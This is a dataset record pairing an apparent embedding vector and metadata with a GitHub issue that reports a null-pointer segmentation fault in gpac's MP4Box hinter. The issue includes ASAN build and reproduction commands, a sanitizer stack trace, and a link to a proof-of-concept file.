0.006821864750236273, -0.009807770140469074, -0.006386122666299343, -0.0010688183829188347, 0.021929973736405373, 0.0330878309905529, -0.003775241319090128, 0.017015373334288597, 0.0031251998152583838, -0.01982983946800232, -0.014372347854077816, -0.02324434369802475, -0.011007847264409065, 0.011150713078677654, 0.016043882817029953, 0.005332483910024166, -0.021772820502519608, -0.009422031231224537, 0.0017215387197211385, -0.000567893439438194, 0.00011206074123037979, 0.007450476288795471, 0.0121364900842309, 0.02500159852206707, 0.008279100991785526, 0.011557881720364094, -0.00924344826489687, -0.0022644305136054754, 0.002410868415609002, -0.0004361885949037969, -0.00022289372282102704, -0.005936094094067812, -0.012050770223140717, -0.0012259712675586343, 0.0037502397317439318, -0.008679126389324665, 0.0031323430594056845, -0.009222018532454967, -0.011493592523038387, -0.016886794939637184, -0.0294590275734663, 0.007836215198040009, 0.0009188087424263358, -0.008657696656882763, -0.00041163346031680703, -0.0021715674083679914, 0.0010750687215477228, 0.0010072073200717568, -0.021515661850571632, -0.046145807951688766, -0.00837196409702301, 0.0032037761993706226, -0.00589323416352272, 0.0015384912258014083, -0.006657568737864494, -0.005878947209566832, 0.01591530442237854, 0.014800946228206158, -0.011122140102088451, 0.021101349964737892, 0.0032019903883337975, 0.010536388494074345, 0.012886538170278072, -0.00785764493048191, 0.029316160827875137, -0.013222274370491505, 0.004368136636912823, -0.016243895515799522, 0.008221954107284546, 0.006946872919797897, 0.002501945709809661, -0.015843870118260384, 0.017301106825470924, -0.016686782240867615, 0.0054396335035562515, 0.01601530984044075, -0.01147216185927391, -0.01837260276079178, 0.0032180629204958677, -0.010050642304122448, -0.011543595232069492, -0.015358124859631062, -0.023201484233140945, 0.0031341291032731533, 0.024130115285515785, 0.014715226367115974, 0.03337356448173523, 0.0022965753450989723, -0.000021178810129640624, -0.0014438423095270991, 0.0005933415377512574, -0.02140136808156967, -0.02715888060629368, 0.007929078303277493, 0.02253001183271408, 0.009443460963666439, 0.009636330418288708, 0.004460999742150307, 0.0046288673765957355, -0.0020483452826738358, -0.015272404998540878, 0.013508006930351257, -0.018158303573727608, 0.01280796155333519, -0.009114868938922882, 0.003775241319090128, -0.019401241093873978, 0.017201099544763565, 0.00431813346222043, -0.0007973724277690053, 0.007136170752346516, -0.01152216549962759, 0.019372668117284775, -0.019701259210705757, 0.0028358956333249807, 0.022658592090010643, 0.014493783935904503, 0.011900761164724827, 0.011129283346235752, 0.023187197744846344, -0.003985969349741936, -0.017944004386663437, -0.01621532253921032, -0.021972833201289177, -0.010193509049713612, 0.0008888961165212095, 0.027530331164598465, -0.005053894594311714, 0.011207859963178635, -0.012379363179206848, 0.010300658643245697, -0.007586199324578047, 0.0007362078176811337, -0.002735889283940196, 0.014550930820405483, 0.0006723644328303635, -0.0007245999295264482, 0.012500799261033535, 0.014643793925642967, -0.00259659462608397, 0.006432554218918085, 0.0033448566682636738, 0.018415464088320732, -0.0001591619657119736, 0.011043563485145569, 0.010714970529079437, -0.011586455628275871, -0.003314497647807002, -0.0024537283461540937, -0.009143441915512085, 0.0008290708647109568, -0.01359372679144144, 0.01440806407481432, -0.016372475773096085, -0.008007654920220375, -0.009443460963666439, -0.0033073544036597013, 0.016243895515799522, 0.008464827202260494, 0.011543595232069492, 0.003996684215962887, 0.025601636618375778, 0.005871803965419531, 0.016972513869404793, -0.03365929424762726, 0.010864980518817902, -0.03605945035815239, 0.0076862056739628315, 0.002178710652515292, -0.004939601756632328, -0.024144401773810387, 0.00970776379108429, 0.029830479994416237, 0.009407744742929935, -0.006600422319024801, -0.0071075973100960255, 0.00249480246566236, -0.0006384336738847196, -0.0027948215138167143, 0.0009473820100538433, 0.0060718166641891, -0.004203840158879757, 0.010950700379908085, -0.005725366063416004, -0.015515278093516827, 0.012365076690912247, 0.012850821949541569, -0.007086167577654123, -0.003196632955223322, -0.00924344826489687, -0.012265070341527462, -0.03943109139800072, -0.011164999566972256, 0.014315200969576836, -0.00918630138039589, 0.012986544519662857, 0.02925901487469673, -0.011329296045005322, 0.00700401933863759, -0.014643793925642967, 0.008729130029678345, -0.018872635439038277, -0.0015081322053447366, -0.017286820337176323, 0.01634390279650688, 0.012786531820893288, -0.0011848971480503678, 0.015886729583144188, 0.011822184547781944, -0.013179413974285126, -0.012672238983213902, -0.013229417614638805, 0.00315020140260458, -0.0038181012496352196, 0.023630082607269287, 0.02664456143975258, 0.01664392091333866, -0.015858156606554985, 0.012407936155796051, 0.0022555014584213495, -0.009679190814495087, -0.002096562646329403, -0.012015054002404213, -0.013465146534144878, -0.012765102088451385, -0.00837196409702301, 0.00405383063480258, 0.015458131209015846, -0.0024894450325518847, 0.0008790740976110101, 0.005089611280709505, -0.01353657990694046, -0.031116275116801262, 0.020429877564311028, 0.006611137185245752, 0.013257990591228008, -0.012472226284444332, -0.007329040206968784, 0.00746476324275136, -0.011179286055266857, 0.0011491805780678988, 0.006575420498847961, -0.00304840924218297, -0.01705823466181755, -0.015472417697310448, 0.02107277698814869, -0.0061468216590583324, 0.022087126970291138, 0.029601892456412315, 0.012693668715655804, -0.004125264007598162, -0.005839659366756678, -0.011600742116570473, 0.00785764493048191, -0.007493336219340563, -0.016815360635519028, 0.004800307098776102, 0.025958802551031113, 0.002387652639299631, 0.018444037064909935, -0.007364756893366575, -0.014122331514954567, -0.015658143907785416, 0.013850885443389416, 0.003212705487385392, 0.02264430560171604, 0.0016188535373657942, -0.013915175572037697, 0.017315393313765526, -0.004010970704257488, -0.02604452334344387, -0.023430069908499718, -0.019444100558757782, 0.008057658560574055, 0.0060182418674230576, 0.0008478220552206039, 0.006489700637757778, 0.008857709355652332, 0.008229097351431847, -0.013772309757769108, 0.004193125292658806, -0.010422094725072384, -0.012072200886905193, -0.02055845782160759, -0.004128835629671812, 0.0024590857792645693, 0.01312941126525402, 0.014358061365783215, -0.036202315241098404, -0.005703936330974102, 0.008972002193331718, -0.004421711433678865, -0.014686653390526772, 0.007614772766828537, 0.012343646958470345, -0.005828944034874439, -0.005875375587493181, -0.002351936185732484, -0.018729768693447113, -0.0258302241563797, -0.0032537796068936586, 0.018158303573727608, 0.012493656016886234, -0.009786340408027172, 0.018344029784202576, -0.009464890696108341, -0.032287780195474625, -0.010722114704549313, -0.0076004862785339355, -0.01837260276079178, -0.010057786479592323, -0.00030693926964886487, 0.026073096320033073, -0.019686972722411156, -0.01634390279650688, -0.01942981407046318, 0.010350662283599377, 0.009350597858428955, 0.006200396455824375, -0.01590101607143879, -0.014986672438681126, -0.01306512113660574, -0.0017635056283324957, 0.017601124942302704, -0.0038431028369814157, -0.023430069908499718, 0.019444100558757782, -0.008536260575056076, 0.0003511385293677449, 0.015672430396080017, -0.004218127112835646, -0.02367294207215309, 0.0031912755221128464, 0.0030037635006010532, -0.028958994895219803, 0.010307801887392998, -0.03437362611293793, -0.01870119571685791, 0.008707699365913868, -0.02264430560171604, -0.008300530724227428, 0.013436573557555676, 0.012715098448097706, -0.020629890263080597, -0.015772437676787376, -0.0006437911652028561, 0.02261573262512684, 0.0036752349697053432, 0.028430389240384102, -0.01868690922856331, 0.012357933446764946, -0.007929078303277493, 0.014022325165569782, -0.012286500073969364, -0.00790050532668829, -0.00563250295817852, -0.004150265362113714, 0.012893681414425373, 0.006761146709322929, -0.0014849164290353656, -0.004000255838036537, 0.02573021687567234, -0.0022983611561357975, -0.007386186625808477, 0.007693348918110132, -0.00036430900217965245, -0.020315585657954216, 0.00720403203740716, 0.026273109018802643, 0.00385024631395936, -0.010486384853720665, 0.003185918089002371, 0.003935966175049543, 0.012572232633829117, -0.002512660576030612, 0.002446585102006793, 0.012486512772738934, -0.02220141887664795, -0.028787555173039436, -0.01725824736058712, 0.002618024591356516, -0.010222082026302814, -0.0069218710996210575, -0.0021394225768744946, 0.011829327791929245, 0.0018965498311445117, 0.0016411764081567526, 0.02251572534441948, 0.0056253597140312195, 0.00033618221641518176, -0.0010964986868202686, 0.03337356448173523, -0.009629187174141407, 0.0030216218437999487, -0.006289687938988209, 0.007343326695263386, -0.015458131209015846, 0.006511130835860968, -0.0057289376854896545, -0.010672111064195633, -0.012722242623567581, -0.022972898557782173, -0.004568149335682392, 0.010279228910803795, -0.0037716696970164776, 0.013215131126344204, -0.02491587959229946, -0.018001150339841843, 0.00945060420781374, -0.004893170204013586, 0.02140136808156967, 0.019144080579280853, -0.001542955869808793, 0.0004357421421445906, -0.014700939878821373, -0.012565089389681816, -0.0057182228192687035, 0.00699687609449029, 0.029159007593989372, 0.0015447416808456182, -0.032887816429138184, 0.025744503363966942, -0.021544234827160835, 0.031344860792160034, 0.013972322456538677, 0.001767077250406146, -0.015429558232426643, 0.0071183121763169765, -0.003464507171884179, -0.005786084104329348, -0.004271701909601688, -0.012507942505180836, 0.01332228071987629, 0.001959053799510002, -0.0006487022037617862, 0.002398367738351226, 0.01984412595629692, -0.008757703006267548, 0.00817195139825344, -0.0002651955292094499, -0.006646853871643543, 0.001142037333920598, 0.01373659260571003, 0.03597372770309448, -0.006929014343768358, 0.008214810863137245, -0.0003011353255715221, -0.018629763275384903, -0.010657824575901031, 0.0009357741218991578, -0.00011953889770666137, 0.009386315010488033, -0.00018594939319882542, -0.016172463074326515, 0.0009839915437623858, 0.0052896239794790745, 0.020701324567198753, 0.0012045413022860885, -0.010400664992630482, 0.019501246511936188, -0.007664775941520929, 0.020587030798196793, 0.007114740554243326, 0.00016987693379633129, -0.00015123735647648573, 0.005964667070657015, 0.01240079291164875, -0.009522037580609322, 0.0024376558139920235, -0.00521819107234478, 0.009550610557198524, 0.0032769953832030296, -0.0018911923980340362, -0.0180868711322546, 0.0071540288627147675, -0.03191632777452469, 0.009493464604020119, -0.0068754395470023155, -0.005786084104329348, 0.0067718615755438805, -0.008014798164367676, 0.0022769314236938953, 0.01795829087495804, -0.030201930552721024, 0.0185869038105011, -0.03545941039919853, 0.006661140359938145, 0.047374457120895386, 0.010186365805566311, -0.02283003181219101, -0.01775827817618847, -0.007421903312206268, -0.01286510843783617, 0.004746732302010059, -0.016858220100402832, -0.002175139030441642, -0.007971938699483871, -0.004193125292658806, -0.015586711466312408, 0.012150777503848076, -0.019858412444591522, -0.015043819323182106, -0.005032464861869812, 0.004271701909601688, -0.04428854584693909, 0.009814913384616375, -0.004903885070234537, -0.021872827783226967, 0.01787257194519043, 0.006039672065526247, -0.026730280369520187, 0.018329743295907974, 0.011007847264409065, 0.005303910467773676, 0.00790050532668829, 0.0006951337563805282, 0.010022069327533245, 0.0026233820244669914, -0.002166209975257516, -0.020701324567198753, 0.0029501887038350105, 0.028587542474269867, -0.009207732044160366, -0.000015193493709375616, 0.00991491973400116, 0.006575420498847961, -0.03174488618969917, 0.02800179086625576, 0.014565217308700085, 0.01745826005935669, 0.008757703006267548, 0.002793035702779889, -0.032602086663246155, -0.008907712064683437, 0.007182602304965258, 0.0021233500447124243, 0.026001662015914917, -0.027016013860702515, 0.006653997115790844, -0.005503923632204533, -0.0060182418674230576, -0.01674392819404602, 0.018872635439038277, 0.006814721506088972, -0.004843167029321194, -0.004846738651394844, 0.009007719345390797, 0.03128771483898163, 0.009407744742929935, -0.005293195601552725, -0.0034484348725527525, 0.00655756238847971, 0.02707315981388092, 0.00516461580991745, -0.0018840490374714136, 0.008771989494562149, 0.003764526452869177, -0.01347943302243948, -0.005121756345033646, 0.016072455793619156, 0.0019269089680165052, -0.004593150690197945, 0.0069683026522397995, -0.012757958844304085, -0.0002698833413887769, 0.006268258206546307, -0.018515469506382942, 0.005368200596421957, -0.0051967608742415905, 0.008150521665811539, -0.012786531820893288, -0.003925250843167305, 0.005414632149040699, 0.0014813446905463934, -0.0018215450691059232, -0.005946808960288763, -0.005032464861869812, -0.002107277512550354, -0.01570100337266922, -0.011407872661948204, -0.029916198924183846, 0.00700044771656394, -0.007068309001624584, 0.02005842514336109, 0.00539677357301116, -0.009200588800013065, 0.009600614197552204, 0.010036355815827847, 0.006225398276001215, -0.010836407542228699, 0.0040395441465079784, 0.003326998557895422, 0.017201099544763565, -0.007807642221450806, 0.006750431843101978, 0.004218127112835646, -0.0017215387197211385, 0.007400473114103079, -0.0006540596950799227, 0.021201355382800102, 0.005111041013151407, -0.00882913637906313, 0.004593150690197945, 0.01880120299756527, -0.0047681620344519615, 0.022129986435174942, 0.00015804581926204264, -0.01828688383102417, 0.0060075270012021065, 0.008657696656882763, -0.004800307098776102, 0.012100773863494396, -0.01982983946800232, 0.004689585417509079, -0.0023376494646072388, -0.0003772562777157873, 0.004661012440919876, -0.012900824658572674, -0.012529372237622738, -0.004425283055752516, -0.005603929981589317, 0.008086231537163258, 0.005493208300322294, -0.02665884792804718, -0.0007317432318814099, 0.012107917107641697, 0.00045404687989503145, -0.02015843242406845, -0.010879267007112503, -0.00679686339572072, 0.008650553412735462, 0.00700044771656394, -0.015943877398967743, -0.011915047653019428, -0.0071540288627147675, 0.0170439463108778, -0.0017715418944135308, 0.0012768673477694392, 0.002457299968227744, -0.0074433330446481705, 0.018886921927332878, -0.012722242623567581, 0.004503859672695398, 0.024815872311592102, -0.007289751898497343, 0.03108770214021206, 0.003968110773712397, 0.001019708113744855, -0.005157472565770149, 0.01727253384888172, -0.014172335155308247, -0.029401879757642746, 0.009079151786863804, 0.001558135380037129, 0.0021251358557492495, 0.0037930996622890234, -0.0022501437924802303, -0.012972258031368256, 0.02540162391960621, -0.0007263857405632734, -0.005686077754944563, 0.012265070341527462, 0.0037823847960680723, 0.02095848321914673, 0.010707827284932137, 0.021658528596162796, 0.0012322216061875224, 0.0005607501370832324, -0.002884112996980548, -0.005132471211254597, -0.02498731203377247, 0.009986353106796741, 0.012615092098712921, -0.024201547726988792, 0.006932586431503296, -0.005482493434101343, 0.005782512482255697, -0.019915560260415077, 0.00029778690077364445, 0.03017335757613182, -0.013029404915869236, -0.02253001183271408, -0.012086487375199795, -0.008436254225671291, 0.005203904118388891, 0.00038239051355049014, 0.01972983404994011, -0.0065289889462292194, 0.0026323110796511173, 0.030544809997081757, -0.008550547063350677, 0.013229417614638805, 0.002587665570899844, 0.0032769953832030296, 0.002768034115433693, -0.005971810314804316, 0.0024733725003898144, 0.008043371140956879, -0.01352943666279316, -0.017601124942302704, -0.018101157620549202, 0.02850182354450226, 0.022887177765369415, 0.018144017085433006, -0.008150521665811539, -0.015529564581811428, -0.009050578810274601, 0.007493336219340563, 0.011843614280223846, -0.0036680917255580425, -0.001784042688086629, 0.009607757441699505, 0.010736401192843914, -0.0016751071671023965, 0.004818165209144354, 0.018744055181741714, 0.011336439289152622, -0.014886666089296341, 0.00898628868162632, -0.0071647437289357185, -0.0005196760757826269, 0.03460221365094185, 0.013758022338151932, 0.03605945035815239, 0.008750559762120247, -0.022044267505407333, 0.0038538179360330105, -0.015058105811476707, -0.004596722312271595, 0.014629507437348366, -0.02408725395798683, -0.0185869038105011, 0.02015843242406845, -0.03705951198935509, 0.015186685137450695, -0.0046181525103747845, -0.019786980003118515, 0.000854072452057153, 0.0016188535373657942, 0.00495745986700058, 0.00021541556634474546, 0.0053932019509375095, -0.003259137040004134, 0.00785764493048191, -0.005178902763873339, -0.024344414472579956, 0.0035502270329743624, 0.01239364966750145, 0.004693157505244017, 0.01571528986096382, -0.004450284410268068, 0.011736464686691761, 0.01838688924908638, 0.0028591114096343517, -0.0027144593186676502, 0.009400601498782635, -0.02130136266350746, 0.005939665716141462, -0.001222399645484984, -0.003953824285417795, 0.01797257736325264, -0.0054289186373353004, 0.021515661850571632, 0.007971938699483871, -0.009229161776602268, 0.00472887372598052, 0.003537726355716586, -0.01942981407046318, -0.004028829280287027, -0.0009063079487532377, -0.009729193523526192, 0.004700300749391317, -0.01400803867727518, -0.009893490001559258, 0.0022805030457675457, -0.00767191918566823, -0.002610881347209215, -0.007979081943631172, -0.009086295031011105, -0.009200588800013065, -0.02460157312452793, 0.032087765634059906, -0.008936285972595215, 0.0029109003953635693, 0.0074076163582503796, -0.012750815600156784, 0.01642962172627449, 0.0011938263196498156, 0.006496843881905079, 0.007929078303277493, -0.011479305103421211, -0.00805051438510418, 0.01065068133175373, -0.003996684215962887, 0.004218127112835646, -0.007557626347988844, 0.0067254300229251385, 0.02127278968691826, -0.010057786479592323, -0.00010497323091840371, 0.004882454872131348, -0.008893425576388836, -0.012957971543073654, -0.007507623173296452, -0.004900313448160887, 0.010272085666656494, -0.0005812871968373656, -0.002571593038737774, -0.001644748030230403, 0.003932394552975893, 0.009900633245706558, 0.019815552979707718, 0.01240079291164875, 0.03254493698477745, 0.0030734108295291662, -0.01600102335214615, -0.008279100991785526, 0.022444292902946472, 0.003082339884713292, 0.009850629605352879, -0.00022479116159956902, -0.005096754524856806, 0.0121436333283782, 0.006453983951359987, 0.0022340714931488037, 0.014958099462091923, -0.023615796118974686, -0.007586199324578047, 0.010193509049713612, -0.0022394289262592793, -0.0030216218437999487, 0.00326806609518826, 0.01735825277864933, 0.000683972320985049, 0.01798686385154724, 0.023315776139497757, -0.0002350596769247204, -0.006382551044225693, 0.0036198743619024754, 0.012507942505180836, -0.0074076163582503796, -0.013207987882196903, -0.004157408606261015, 0.0004261433205101639, 0.007579056080430746, -0.018244024366140366, -0.007471906486898661, 0.01820116490125656, -0.01984412595629692, -0.02357293665409088, -0.006025385111570358, 0.0010357805294916034, -0.006036100443452597, 0.008707699365913868, -0.014515213668346405, 0.01942981407046318, 0.022858604788780212, 0.0013268705224618316, -0.0066897133365273476, 0.0054753501899540424, 0.005464635323733091, 0.010493528097867966, 0.01807258464396, -0.025573063641786575, -0.009900633245706558, -0.03474507853388786, -0.01581529714167118, -0.007636202499270439, 0.015629570931196213, 0.002151923254132271, -0.009564897045493126, -0.016043882817029953, -0.005378915462642908, -0.02148708887398243, 0.006411124486476183, 0.0320591926574707, 0.007239748723804951, 0.006361121311783791, 0.0139437485486269, 0.00498960493132472, -0.03845960274338722, 0.011965051293373108, -0.020815616473555565, 0.026215963065624237, 0.0007839787285774946, -0.011443588882684708, -0.007543339394032955, 0.013465146534144878, 0.0038395312149077654, -0.0012697241036221385, 0.006704000290483236, -0.0008228204678744078, 0.01157931238412857, 0.014229481108486652, 0.009400601498782635, -0.0009822056163102388, 0.02737317979335785, -0.013300850987434387, -0.004893170204013586, 0.005907520651817322, 0.00038573896745219827, 0.0206584632396698, 0.010914984159171581, -0.0005000319797545671, -0.008614836260676384, -0.005368200596421957, 0.02075847052037716, -0.02002985216677189, 0.013543723151087761, -0.020472737029194832, -0.0049074566923081875, -0.005739652551710606, -0.005328912287950516, 0.006107533350586891, 0.01641533523797989, 0.004586007446050644, 0.018158303573727608, -0.008693412877619267, 0.00006931246753083542, -0.0021412083879113197, 0.011636458337306976, -0.030744822695851326, -0.01612960360944271, -0.004307418130338192, -0.0103363748639822, 0.002223356394097209, -0.008221954107284546, -0.007879075594246387, -0.01964411325752735, -0.008093374781310558, -0.02150137536227703, 0.011822184547781944, 0.010272085666656494, 0.0010750687215477228, 0.01425805501639843, 0.01954410783946514, 0.03505938500165939, -0.004936030134558678, -0.0018465466564521194, 0.001091141253709793, 0.013007975183427334, -0.003348428523167968, -0.005457492079585791, -0.02335863746702671, -0.0023108620662242174, 0.01044352538883686, 0.0170439463108778, 0.004807450342923403, -0.00764334574341774, 0.00965776015073061, 0.009764909744262695, -0.00816480815410614, 0.0018858348485082388, 0.011557881720364094, -0.0017751135164871812, -0.007950508035719395, 0.006161108147352934, -0.0037466681096702814, -0.007886218838393688, -0.010864980518817902, -0.005021749529987574, 0.022144272923469543, 0.023415783420205116, -0.0222299937158823, 0.029216153547167778, 0.01974412053823471, 0.0034930806141346693, 0.01715824007987976, 0.010143505409359932, -0.004043115768581629, -0.0036930933129042387, 0.0047681620344519615, 0.01664392091333866, 0.0014134832890704274, 0.008793419227004051, 0.0034323623403906822, -0.015229545533657074, 0.023630082607269287, 0.012100773863494396, 0.005707507953047752, 0.0023697942961007357, 0.03625946119427681, -0.026215963065624237, 0.005518210120499134, -0.006939729675650597, 0.031230568885803223, 0.003057338297367096, -0.003478793893009424, -0.01017922256141901, 0.00015067927597556263, 0.026944579556584358, 0.05114612728357315, -0.01197933778166771, 0.008593406528234482, -0.007679062429815531, 0.0068182931281626225, 0.0008438039803877473, -0.04020256921648979, 0.023015758022665977, -0.006804006639868021, 0.008550547063350677, 0.015329551883041859, -0.00518961763009429, -0.007021877449005842, -0.0090434355661273, 0.0066325669176876545, -0.004389566369354725, 0.025473058223724365, 0.00519318925216794, -0.019686972722411156, 0.0027305318508297205, 0.00720403203740716, -0.010972130112349987, 0.014915239997208118, 0.013386569917201996, 0.00566107640042901, -0.009343454614281654, -0.016486769542098045, -0.007050450891256332, -0.0040038274601101875, 0.004064545501023531, -0.01052924431860447, 0.0009013969101943076, -0.006357549224048853, -0.005457492079585791, -0.01312226802110672, -0.005711079575121403, -0.001923337229527533, 0.009764909744262695, 0.010064929723739624, 0.003639518516138196, -0.04431711882352829, 0.004132407251745462, -0.004896741826087236, 0.0005228013033047318, 0.0008853244944475591, -0.012679382227361202, -0.005957523826509714, 0.0004594043712131679, -0.028887562453746796, 0.012007910758256912, -0.003187703900039196, 0.006750431843101978, -0.01837260276079178, 0.01995841972529888, 0.015172398649156094, 0.003085911739617586, -0.024015821516513824, 0.0008826457196846604, 0.023172911256551743, -0.009129155427217484, 0.014100901782512665, 0.024344414472579956, -0.004589579068124294, 0.01932980678975582, 0.021344222128391266, 0.004993176553398371, -0.01063639484345913, -0.004046687390655279, 0.010229225270450115, 0.008200524374842644, 0.010572104714810848, -0.013343710452318192, -0.009550610557198524, 0.002464443212375045, 0.014972385950386524, -0.007329040206968784, 0.0016322472365573049, -0.009536324068903923, 0.002626953646540642, 0.013686589896678925, 0.011279292404651642, -0.010729257948696613, 0.002259073080495, 0.011393586173653603, 0.019801266491413116, -0.011757894419133663, -0.017172526568174362, 0.01807258464396, -0.0020608461927622557, 0.006003955379128456, -0.007771925535053015, -0.014229481108486652, -0.03448791801929474, 0.007979081943631172, 0.02303004451096058, 0.015015246346592903, -0.018744055181741714, 0.009807770140469074, 0.00977205391973257, -0.023187197744846344, 0.01901550218462944, -0.002689457731321454, 0.016658207401633263, 0.007182602304965258, -0.013908032327890396, 0.02850182354450226, 0.01734396629035473, -0.006132535170763731, 0.02190140075981617, -0.022287139669060707, -0.008650553412735462, -0.01327227707952261, -0.0026966009754687548, 0.0020340585615485907, -0.013558009639382362, -0.016501056030392647, 0.012472226284444332, -0.04817450791597366, -0.006800435017794371, 0.0024144400376826525, 0.01105784997344017, 0.006568277254700661, 0.004686013795435429, -0.0011795397149398923, -0.003059124108403921, -0.010222082026302814, 0.015100965276360512, 0.007893362082540989, 0.0026394545566290617, -0.008886282332241535, 0.00008739397890167311, 0.007225462235510349, -0.019186941906809807, -0.025387337431311607, 0.046145807951688766, 0.01554385107010603, 0.012050770223140717, 0.00746476324275136, -0.0043859947472810745, 0.0045252894051373005, -0.00017065824067685753, -0.009129155427217484, -0.01105784997344017, 0.020944196730852127, -0.0013893746072426438, -0.008079088293015957, 0.028258949518203735, -0.012179350480437279, -0.007921935059130192, 0.006225398276001215, -0.0038859627675265074, -0.014136618003249168, -0.005321769043803215, -0.026301681995391846, -0.01192933414131403, 0.0023733661510050297, 0.03800243139266968, -0.01922980137169361, 0.0069218710996210575, 0.006057530175894499, -0.003814529627561569, -0.01260080561041832, 0.02271573804318905, -0.0144723542034626, 0.018829775974154472, -0.006418267730623484, -0.0013286564499139786, 0.020187005400657654, 0.006464699283242226, -0.008929142728447914, 0.009436317719519138, 0.016286754980683327, -0.0010304230963811278, -0.017515406012535095, 0.006889726500958204, 0.007921935059130192, -0.011086422950029373, 0.005575356539338827, 0.017101094126701355, -0.0033162834588438272, -0.013086550869047642, 0.005564641673117876, 0.0024376558139920235, 0.006221826653927565, -0.0025287331081926823, -0.00767191918566823, -0.00632897624745965, 0.006625423673540354, -0.0034573639277368784, -0.012800818309187889, 0.007607629522681236, -0.010922127403318882, 0.0025983804371207952, -0.017086807638406754, -0.0033162834588438272, -0.019686972722411156, -0.0028823271859437227, 0.014800946228206158, -0.023172911256551743, -0.004836023785173893, 0.00897914543747902, 0.02274431101977825, -0.01358658354729414, 0.01735825277864933, 0.01664392091333866, -0.0007232605130411685, -0.0047217304818332195, 0.0009589898982085288, -0.005550354719161987, -0.018929781392216682, 0.012715098448097706, -0.0076862056739628315, 0.005693220999091864, -0.0013224059948697686, -0.010864980518817902, -0.015315265394747257, 0.00039399840170517564, -0.003696664934977889, 0.0007589770830236375, -0.013400857336819172, -0.017315393313765526, -0.014600933529436588, -0.0007388865342363715, 0.0217013880610466, 0.021615667268633842, 0.010807833634316921, -0.013207987882196903, 0.0027966073248535395, 0.007764782290905714, -0.006503987591713667, -0.012486512772738934, -0.00767191918566823, -0.00945060420781374, 0.0033662866335362196, 0.0010741758160293102, 0.0067718615755438805, -0.03148772940039635, -0.0037395248655229807, 0.019272660836577415, -0.02273002453148365, 0.014986672438681126, -0.013150840997695923, -0.007893362082540989, 0.00653613219037652, 0.001946553005836904, -0.004271701909601688, -0.011450732126832008, -0.006611137185245752, 0.01850118301808834, 0.006164679769426584, -0.012029340490698814, -0.008021941408514977, 0.006843294948339462, -0.017944004386663437, -0.007743352558463812, -0.011243576183915138, 0.0454886220395565, 0.003109127515926957, 0.014086615294218063, -0.0011161428410559893, 0.010893553495407104, 0.013186557218432426, -0.009822056628763676, 0.021458515897393227, 0.0073504699394106865, -0.013658015988767147, 0.014122331514954567, 0.011386441998183727, 0.006039672065526247, 0.021229928359389305, -0.005332483910024166, 0.02293003723025322, 0.008000511676073074, -0.006264686118811369, -0.025601636618375778, 0.05548926442861557, -0.00950060784816742, 0.00997206661850214, 0.0013429430546239018, -0.007075452711433172, -0.00033015504595823586, -0.0005696793086826801, -0.006132535170763731, -0.017701132223010063, 0.023201484233140945, 0.02333006262779236, 0.011679318733513355, 0.003001977689564228, 0.011357869021594524, 0.010307801887392998, 0.003085911739617586, 0.008679126389324665, -0.02561592310667038, 0.007879075594246387, -0.000877288228366524, 0.0029573319479823112, -0.007275465410202742, 0.00035783537896350026, 0.006989732850342989, 0.013429430313408375, -0.002062632003799081, 0.0029109003953635693, 0.004650297574698925, 0.004389566369354725, -0.014843806624412537, -0.002557306317612529, -0.019044075161218643, -0.01788685843348503, 0.015372411347925663, 0.004836023785173893, 0.009443460963666439, 0.003444863250479102, 0.015743864700198174, -0.005936094094067812, 0.0010438167955726385, 0.005064609460532665, -0.015758151188492775, 0.018129730597138405, 0.03185918182134628, -0.001340264338068664, -0.014358061365783215, -0.005096754524856806, 0.020501311868429184, 0.005603929981589317, 0.002316219499334693, -0.008086231537163258, 0.01327942032366991, -0.01130786631256342, -0.022758597508072853, 0.027658911421895027, 0.024644432589411736, 0.007529052905738354, 0.024030108004808426, -0.015358124859631062, 0.002605523681268096, -0.018858348950743675, -0.004950316622853279, 0.015658143907785416 ]
1,696
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
SEGV was found in MP4Box, to reproduce, compile gpac as follows: ``` CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-debug ``` run poc file : ``` ./bin/gcc/MP4Box -hint poc -out /dev/null ``` Detailed ASAN result is as below: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==36074==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000014 (pc 0x7ff548545e22 bp 0x7fff51b92c70 sp 0x7fff51b90430 T0) ==36074==The signal is caused by a WRITE memory access. ==36074==Hint: address points to the zero page. #0 0x7ff548545e21 in gf_hinter_finalize media_tools/isom_hinter.c:1249 #1 0x5568f448e019 in HintFile /home/lab4/src/gpac/applications/mp4box/main.c:3467 #2 0x5568f4498e70 in mp4boxMain /home/lab4/src/gpac/applications/mp4box/main.c:6209 #3 0x5568f4499653 in main /home/lab4/src/gpac/applications/mp4box/main.c:6335 #4 0x7ff547f8b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #5 0x5568f44852ad in _start (/home/lab4/src/gpac/bin/gcc/MP4Box+0x182ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/isom_hinter.c:1249 in gf_hinter_finalize ==36074==ABORTING ``` Credit : ADLab of Venustech [poc_segv_isom_hinter.zip](https://github.com/gpac/gpac/files/6403881/poc_segv_isom_hinter.zip)
SEGV in gpac MP4Box in file isom_hinter.c:1249
https://api.github.com/repos/gpac/gpac/issues/1771/comments
0
2021-04-30T08:18:13
2021-04-30T09:07:33Z
https://github.com/gpac/gpac/issues/1771
872,149,998
1,771
false
This is a GitHub Issue repo:gpac owner:gpac Title : SEGV in gpac MP4Box in file isom_hinter.c:1249 Issue date: --- start body --- SEGV was found in MP4Box, to reproduce, compile gpac as follows: ``` CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-debug ``` run poc file : ``` ./bin/gcc/MP4Box -hint poc -out /dev/null ``` Detailed ASAN result is as below: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==36074==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000014 (pc 0x7ff548545e22 bp 0x7fff51b92c70 sp 0x7fff51b90430 T0) ==36074==The signal is caused by a WRITE memory access. ==36074==Hint: address points to the zero page. #0 0x7ff548545e21 in gf_hinter_finalize media_tools/isom_hinter.c:1249 #1 0x5568f448e019 in HintFile /home/lab4/src/gpac/applications/mp4box/main.c:3467 #2 0x5568f4498e70 in mp4boxMain /home/lab4/src/gpac/applications/mp4box/main.c:6209 #3 0x5568f4499653 in main /home/lab4/src/gpac/applications/mp4box/main.c:6335 #4 0x7ff547f8b0b2 in __libc_start_main 